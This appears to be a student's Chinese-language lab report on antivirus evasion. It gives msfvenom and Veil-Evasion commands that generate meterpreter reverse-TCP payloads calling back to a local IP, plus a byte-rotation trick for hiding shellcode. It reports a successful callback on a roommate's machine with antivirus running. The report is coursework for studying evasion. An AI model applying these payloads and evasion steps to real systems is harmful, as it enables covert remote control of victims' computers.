5213 Exp3 免殺原理與實踐

5213 Exp3 免殺原理與實踐

任務一：正確使用msf編碼器，msfvenom生成如jar之類的其餘文件，veil-evasion，本身利用shellcode編程等免殺工具或技巧

1. 使用msf編碼器生成jar包
   • 使用指令：msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.1.109 lport=5213 x> 5213_backjar.jar
     
   • 上傳掃描的結果：
     
   • 結果彷佛還行
2. 使用veil-evasion生成反彈連接的可執行文件：
   • 下載安裝好veil以後，進入veil依次輸入：
     • use evasion
     • use python/meterpreter/rev_tcp //設置payload
     • set LHOST 192.168.1.109 //設置反彈鏈接IP
     • set LPORT 5213 //設置反彈端口5213
     • generate //生成
     • 5213LZM //程序名
     • 1 //默認選項
   • 但是個人出現了這樣的問題，不知如何解決，但是根據終端提示，雖然沒能生成可執行文件，可是生成了可執行文件的源碼，因此，直接使用這個python源碼來測試，回鏈成功：

3. 本身利用shellcode編程等免殺工具或技巧

   • 生成Shellcode：msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.109 LPORT=443 -f c
     
   • 編寫C程序，並運行測試：

     • 在本身的codeblocks上編譯運行，360出現了警告，將其添加到信任中便可
       

     • 運行：
       

     • 放到網上測試以後的結果只有百分之二十的識別出來了：
       

任務二：經過組合應用各類技術實現惡意代碼免殺

• 經過每一個字節循環移位，來實現代碼的隱藏，實現免殺。
  • 讀取每一個Shellcode字節，並循環向左移位3位，從新輸出整個code，在嵌入的代碼里加上循環向右移位3位，然後執行。

  • 運行結果再次成功：
    

  • 放到網上測試以後的結果只有百分之十及4個殺毒軟件庫識別出來了：
    

  • 360木馬查殺結果：
    

任務三：用另外一電腦實測，在殺軟開啓的狀況下，可運行並回連成功，註明電腦的殺軟名稱與版本

• 本機用的是奇虎360安全衛士，上圖能夠看得出來，這個任務我是在室友的電腦上作的，它用的是安全管家：
  

• 下圖是掃描的結果：
  

• 在同連寢室網的環境下，攻擊成功：
  

任務四：基礎問題回答

（1）殺軟是如何檢測出惡意代碼的？

* 分析惡意程序的行爲特徵，分析其代碼流將其性質歸類於惡意代碼

（2）免殺是作什麼？

* 使惡意代碼避免被查殺，也就是要掩蓋惡意代碼的特徵

（3）免殺的基本方法有哪些？

* 免殺大概能夠分爲兩種狀況：
        1. 二進制的免殺（無源碼），只能經過經過修改asm代碼／二進制數據／其餘數據來完成免殺。
        2. 有源碼的免殺，能夠經過修改源代碼來完成免殺，也能夠結合二進制免殺的技術。

  * 免殺也能夠分爲這兩種狀況：

      1. 靜態文件免殺，被殺毒軟件病毒庫/雲查殺了，也就是文件特徵碼在病毒庫了。
      2. 動態行爲免殺，運行中執行的某些行爲被殺毒軟件攔截報讀。

任務五：實踐總結與體會

* 要想保證本身的計算機環境安全，不能簡單的徹底信任殺毒軟件，保不齊殺毒軟件謙虛了一下，計算機就可能中毒了。

  * 離實戰還缺些什麼技術或步驟？
      * 將後門程序注入受害機，以及讓其如何自啓動。